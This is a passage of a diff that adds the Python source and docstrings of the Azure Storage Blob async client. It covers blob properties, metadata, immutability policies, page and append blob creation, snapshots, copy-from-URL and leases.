+ snapshot=self.snapshot, + **kwargs) + return True + # Encrypted with CPK + except ResourceExistsError: + return True + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceNotFoundError: + return False + + @distributed_trace_async + async def get_blob_properties(self, **kwargs): + # type: (Any) -> BlobProperties + """Returns all user-defined metadata, standard HTTP properties, and + system properties for the blob. It does not return the content of the blob. + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to get properties. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). 
Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: BlobProperties + :rtype: ~azure.storage.blob.BlobProperties + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START get_blob_properties] + :end-before: [END get_blob_properties] + :language: python + :dedent: 12 + :caption: Getting the properties for a blob. + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + try: + cls_method = kwargs.pop('cls', None) + if cls_method: + kwargs['cls'] = partial(deserialize_pipeline_response_into_cls, cls_method) + blob_props = await self._client.blob.get_properties( + timeout=kwargs.pop('timeout', None), + version_id=kwargs.pop('version_id', None), + snapshot=self.snapshot, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=kwargs.pop('cls', None) or deserialize_blob_properties, + cpk_info=cpk_info, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + blob_props.name = self.blob_name + if isinstance(blob_props, BlobProperties): + blob_props.container = self.container_name + blob_props.snapshot = self.snapshot + return blob_props # type: ignore + + @distributed_trace_async + async def set_http_headers(self, content_settings=None, **kwargs): + # type: (Optional[ContentSettings], Any) -> None + """Sets system properties on the blob. + + If one property is set for the content_settings, all properties will be overridden. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. 
+ If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: Dict[str, Any] + """ + options = self._set_http_headers_options(content_settings=content_settings, **kwargs) + try: + return await self._client.blob.set_http_headers(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_blob_metadata(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], Any) -> Dict[str, Union[str, datetime]] + """Sets user-defined metadata for the blob as one or more name-value pairs. + + :param metadata: + Dict containing name and value pairs. Each call to this operation + replaces all existing metadata attached to the blob. To remove all + metadata from the blob, call this operation with no metadata headers. + :type metadata: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. 
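As a usage sketch of the metadata call documented above (hedged: the connection string, container/blob names, and the `category` key are placeholders, not part of the SDK's own samples):

    import asyncio
    from azure.storage.blob.aio import BlobClient

    async def main():
        # Placeholder endpoint and names -- substitute real values.
        blob = BlobClient.from_connection_string(
            "<connection-string>", container_name="mycontainer", blob_name="myblob")
        async with blob:
            # Each call replaces ALL existing metadata on the blob.
            headers = await blob.set_blob_metadata(metadata={"category": "reports"})
            print(headers["etag"], headers["last_modified"])

    asyncio.run(main())

Because the operation replaces rather than merges, a caller that needs to update a single key must first read the current metadata (for example via `get_blob_properties`) and resend the merged dict.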
+ :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + """ + options = self._set_blob_metadata_options(metadata=metadata, **kwargs) + try: + return await self._client.blob.set_metadata(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_immutability_policy(self, immutability_policy, **kwargs): + # type: (ImmutabilityPolicy, **Any) -> Dict[str, str] + """The Set Immutability Policy operation sets the immutability policy on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :param ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: Dict[str, str] + """ + + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + return await self._client.blob.set_immutability_policy(cls=return_response_headers, **kwargs) + + @distributed_trace_async + async def delete_immutability_policy(self, **kwargs): + # type: (**Any) -> None + """The Delete Immutability Policy operation deletes the immutability policy on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + + await self._client.blob.delete_immutability_policy(**kwargs) + + @distributed_trace_async + async def set_legal_hold(self, legal_hold, **kwargs): + # type: (bool, **Any) -> Dict[str, Union[str, datetime, bool]] + """The Set Legal Hold operation sets a legal hold on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :param bool legal_hold: + Specified if a legal hold should be set on the blob. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, legal hold). + :rtype: Dict[str, Union[str, datetime, bool]] + """ + + return await self._client.blob.set_legal_hold(legal_hold, cls=return_response_headers, **kwargs) + + @distributed_trace_async + async def create_page_blob( # type: ignore + self, size, # type: int + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + premium_page_blob_tier=None, # type: Optional[Union[str, PremiumPageBlobTier]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """Creates a new Page Blob of the specified size. + + :param int size: + This specifies the maximum size for the page blob, up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. 
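For instance, a minimal sketch of the alignment rule just stated (hedged: `blob` is the hypothetical async BlobClient from the earlier metadata sketch):

    async with blob:
        # 1 MiB page blob; `size` must be a multiple of 512 bytes.
        await blob.create_page_blob(size=1024 * 1024)
        # A misaligned size such as 1000 would be rejected by the service.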
+ :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :param ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword int sequence_number: + Only for Page blobs. The sequence number is a user-controlled value that you can use to + track requests. The value of the sequence number must be between 0 + and 2^63 - 1. The default value is 0. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. 
If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict[str, Any] + """ + options = self._create_page_blob_options( + size, + content_settings=content_settings, + metadata=metadata, + premium_page_blob_tier=premium_page_blob_tier, + **kwargs) + try: + return await self._client.page_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def create_append_blob(self, content_settings=None, metadata=None, **kwargs): + # type: (Optional[ContentSettings], Optional[Dict[str, str]], Any) -> Dict[str, Union[str, datetime]] + """Creates a new Append Blob. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. 
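A minimal sketch of creating and then growing an append blob (hedged: `blob` is the same hypothetical client used in the earlier sketches; `append_block` is documented elsewhere in this class):

    async with blob:
        await blob.create_append_blob()
        # Append blobs are extended block-by-block at the end.
        await blob.append_block(b"log line 1\n")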
+ :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict[str, Any] + """ + options = self._create_append_blob_options( + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return await self._client.append_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def create_snapshot(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], Any) -> Dict[str, Union[str, datetime]] + """Creates a snapshot of the blob. + + A snapshot is a read-only version of a blob that's taken at a point in time. + It can be read, copied, or deleted, but not modified. Snapshots provide a way + to back up a blob as it appears at a moment in time. + + A snapshot of a blob has the same name as the base blob from which the snapshot + is taken, with a DateTime value appended to indicate the time at which the + snapshot was taken. + + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. 
+ As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Snapshot ID, Etag, and last modified). + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START create_blob_snapshot] + :end-before: [END create_blob_snapshot] + :language: python + :dedent: 12 + :caption: Create a snapshot of the blob. + """ + options = self._create_snapshot_options(metadata=metadata, **kwargs) + try: + return await self._client.blob.create_snapshot(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def start_copy_from_url(self, source_url, metadata=None, incremental_copy=False, **kwargs): + # type: (str, Optional[Dict[str, str]], bool, Any) -> Dict[str, Union[str, datetime]] + """Copies a blob from the given URL. + + This operation returns a dictionary containing `copy_status` and `copy_id`, + which can be used to check the status of or abort the copy operation. + `copy_status` will be 'success' if the copy completed synchronously or + 'pending' if the copy has been started asynchronously. For asynchronous copies, + the status can be checked by polling the :func:`get_blob_properties` method and + checking the copy status. Set `requires_sync` to True to force the copy to be synchronous. + The Blob service copies blobs on a best-effort basis. + + The source blob for a copy operation may be a block blob, an append blob, + or a page blob. If the destination blob already exists, it must be of the + same blob type as the source blob. Any existing destination blob will be + overwritten. The destination blob cannot be modified while a copy operation + is in progress. + + When copying from a page blob, the Blob service creates a destination page + blob of the source blob's length, initially containing all zeroes. Then + the source page ranges are enumerated, and non-empty ranges are copied. + + For a block blob or an append blob, the Blob service creates a committed + blob of zero length before returning from this operation. When copying + from a block blob, all committed blocks and their block IDs are copied. + Uncommitted blocks are not copied. At the end of the copy operation, the + destination blob will have the same committed block count as the source. + + When copying from an append blob, all committed blocks are copied. At the + end of the copy operation, the destination blob will have the same committed + block count as the source. + + :param str source_url: + A URL of up to 2 KB in length that specifies a file or blob. + The value should be URL-encoded as it would appear in a request URI. + If the source is in another account, the source must either be public + or must be authenticated via a shared access signature. If the source + is public, no authentication is required. 
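A hedged sketch of the copy flow described above (the URL and `dest_blob` client are placeholders; `asyncio` was imported in the first sketch):

    async with dest_blob:
        copy = await dest_blob.start_copy_from_url(
            "https://myaccount.blob.core.windows.net/mycontainer/srcblob")
        # Cross-account copies may come back 'pending'; poll the properties.
        while copy["copy_status"] == "pending":
            await asyncio.sleep(1)
            props = await dest_blob.get_blob_properties()
            copy = {"copy_status": props.copy.status, "copy_id": props.copy.id}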
+ Examples: + https://myaccount.blob.core.windows.net/mycontainer/myblob + + https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot= + + https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken + :param metadata: + Name-value pairs associated with the blob as metadata. If no name-value + pairs are specified, the operation will copy the metadata from the + source blob or file to the destination blob. If one or more name-value + pairs are specified, the destination blob is created with the specified + metadata, and metadata is not copied from the source blob or file. + :type metadata: dict(str, str) + :param bool incremental_copy: + Copies the snapshot of the source page blob to a destination page blob. + The snapshot is copied such that only the differential changes between + the previously copied snapshot are transferred to the destination. + The copied snapshots are complete copies of the original snapshot and + can be read or copied from as usual. Defaults to False. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_). + + The (case-sensitive) literal "COPY" can instead be passed to copy tags from the source blob. + This option is only available when `incremental_copy=False` and `requires_sync=True`. + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) or Literal["COPY"] + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only if the source + blob has been modified since the specified date/time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only if the source blob + has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. 
+ Specify this conditional header to copy the blob only + if the destination blob has been modified since the specified date/time. + If the destination blob has not been modified, the Blob service returns + status code 412 (Precondition Failed). + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only + if the destination blob has not been modified since the specified + date/time. If the destination blob has been modified, the Blob service + returns status code 412 (Precondition Failed). + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword source_lease: + Specify this to perform the Copy Blob operation only if + the lease ID given matches the active lease ID of the source blob. + :paramtype source_lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword bool seal_destination_blob: + Seal the destination append blob. This operation is only for append blob. + + .. versionadded:: 12.4.0 + + :keyword bool requires_sync: + Enforces that the service will not return a response until the copy is complete. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. This option is only available when `incremental_copy` is + set to False and `requires_sync` is set to True. + + .. versionadded:: 12.9.0 + + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the sync copied blob. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. 
versionadded:: 12.10.0 + + :returns: A dictionary of copy properties (etag, last_modified, copy_id, copy_status). + :rtype: dict[str, Union[str, ~datetime.datetime]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START copy_blob_from_url] + :end-before: [END copy_blob_from_url] + :language: python + :dedent: 16 + :caption: Copy a blob from a URL. + """ + options = self._start_copy_from_url_options( + source_url=self._encode_source_url(source_url), + metadata=metadata, + incremental_copy=incremental_copy, + **kwargs) + try: + if incremental_copy: + return await self._client.page_blob.copy_incremental(**options) + return await self._client.blob.start_copy_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def abort_copy(self, copy_id, **kwargs): + # type: (Union[str, Dict[str, Any], BlobProperties], Any) -> None + """Abort an ongoing copy operation. + + This will leave a destination blob with zero length and full metadata. + This will raise an error if the copy operation has already ended. + + :param copy_id: + The copy operation to abort. This can be either an ID, or an + instance of BlobProperties. + :type copy_id: str or ~azure.storage.blob.BlobProperties + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START abort_copy_blob_from_url] + :end-before: [END abort_copy_blob_from_url] + :language: python + :dedent: 16 + :caption: Abort copying a blob from URL. + """ + options = self._abort_copy_options(copy_id, **kwargs) + try: + await self._client.blob.abort_copy_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def acquire_lease(self, lease_duration=-1, lease_id=None, **kwargs): + # type: (int, Optional[str], Any) -> BlobLeaseClient + """Requests a new lease. + + If the blob does not have an active lease, the Blob + Service creates a lease on the blob and returns a new lease. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :param str lease_id: + Proposed lease ID, in a GUID string format. The Blob Service + returns 400 (Invalid request) if the proposed lease ID is not + in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. 
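As a sketch of the leasing pattern documented here (hedged: `blob` is the hypothetical client from the earlier sketches):

    async with blob:
        # 15 seconds is the shortest non-infinite lease duration.
        lease = await blob.acquire_lease(lease_duration=15)
        try:
            # While leased, mutating calls must present the lease.
            await blob.set_blob_metadata({"locked": "true"}, lease=lease)
        finally:
            await lease.release()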
+ :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A BlobLeaseClient object. + :rtype: ~azure.storage.blob.aio.BlobLeaseClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START acquire_lease_on_blob] + :end-before: [END acquire_lease_on_blob] + :language: python + :dedent: 12 + :caption: Acquiring a lease on a blob. + """ + lease = BlobLeaseClient(self, lease_id=lease_id) # type: ignore + await lease.acquire(lease_duration=lease_duration, **kwargs) + return lease + + @distributed_trace_async + async def set_standard_blob_tier(self, standard_blob_tier, **kwargs): + # type: (Union[str, StandardBlobTier], Any) -> None + """This operation sets the tier on a block blob. + + A block blob's tier determines Hot/Cool/Archive storage type. + This operation does not update the blob's ETag. + + :param standard_blob_tier: + Indicates the tier to be set on the blob. Options include 'Hot', 'Cool', + 'Archive'. The hot tier is optimized for storing data that is accessed + frequently. The cool storage tier is optimized for storing data that + is infrequently accessed and stored for at least a month. The archive + tier is optimized for storing data that is rarely accessed and stored + for at least six months with flexible latency requirements. + :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 